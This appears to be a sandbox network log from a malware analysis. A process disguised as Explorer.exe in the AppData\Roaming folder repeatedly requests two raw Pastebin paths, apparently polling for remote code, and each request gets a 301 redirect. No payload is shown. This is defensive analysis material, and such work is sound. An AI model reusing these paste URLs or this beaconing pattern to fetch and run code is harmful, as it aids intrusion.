                                                            Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 50010 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:14:12.035274029 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:13.143537998 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:12 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541c70994431a-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:13.145534039 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:13.573201895 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:13 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541c92c02431a-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 50021 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:14:18.720252991 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:19.818943024 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:19 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541f0c87b41b2-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:19.825155973 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:20.148924112 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:19 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541f2eb0b41b2-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 50023 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:14:25.289118052 CET | 50 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:26.385080099 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:26 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54219df960f74-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 50025 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:14:26.752990961 CET | 74 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:27.842161894 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:27 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54222fb7a8cd7-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 50026 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:14:33.110985041 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:34.202969074 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:34 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5424ab8a8421d-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:34.203576088 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:34.525414944 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:34 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5424cbb56421d-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 50028 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:14:39.657366991 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:40.757745028 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:40 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:40 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54273af6cc35f-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:40.758641958 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:41.078350067 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:40 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:40 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54275b8cac35f-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 50030 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:14:46.205348015 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:47.302575111 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:47 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5429c991318c8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:14:47.313771963 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:14:47.635365009 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:47 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5429eaaa418c8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50033 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:14:52.955337048 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
Dec 9, 2024 14:14:54.061490059 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:14:53 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:14:53 GMT
    Location: https://pastebin.com/raw/hbwHfEg3
    Server: cloudflare
    CF-RAY: 8ef542c6c8397c6f-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Dec 9, 2024 14:14:54.066740990 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
    Host: pastebin.com
Dec 9, 2024 14:14:54.387803078 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:14:54 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:14:54 GMT
    Location: https://pastebin.com/raw/KKpnJShN
    Server: cloudflare
    CF-RAY: 8ef542c8ea537c6f-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50036 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:14:59.594583988 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
Dec 9, 2024 14:15:00.693474054 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:00 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:00 GMT
    Location: https://pastebin.com/raw/hbwHfEg3
    Server: cloudflare
    CF-RAY: 8ef542f04f254364-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Dec 9, 2024 14:15:00.699105024 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
    Host: pastebin.com
Dec 9, 2024 14:15:01.053045988 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:00 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:00 GMT
    Location: https://pastebin.com/raw/KKpnJShN
    Server: cloudflare
    CF-RAY: 8ef542f259984364-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50039 | 172.67.19.248 | 80 | 7356 | C:\Users\user\AppData\Roaming\Explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:15:06.222625017 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
Dec 9, 2024 14:15:07.324852943 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 09 Dec 2024 13:15:07 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Mon, 09 Dec 2024 14:15:07 GMT
    Location: https://pastebin.com/raw/hbwHfEg3
    Server: cloudflare
    CF-RAY: 8ef54319b9474405-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Dec 9, 2024 14:15:07.325525999 CET | 50 | OUT | GET /raw/KKpnJShN HTTP/1.1
    Host: pastebin.com
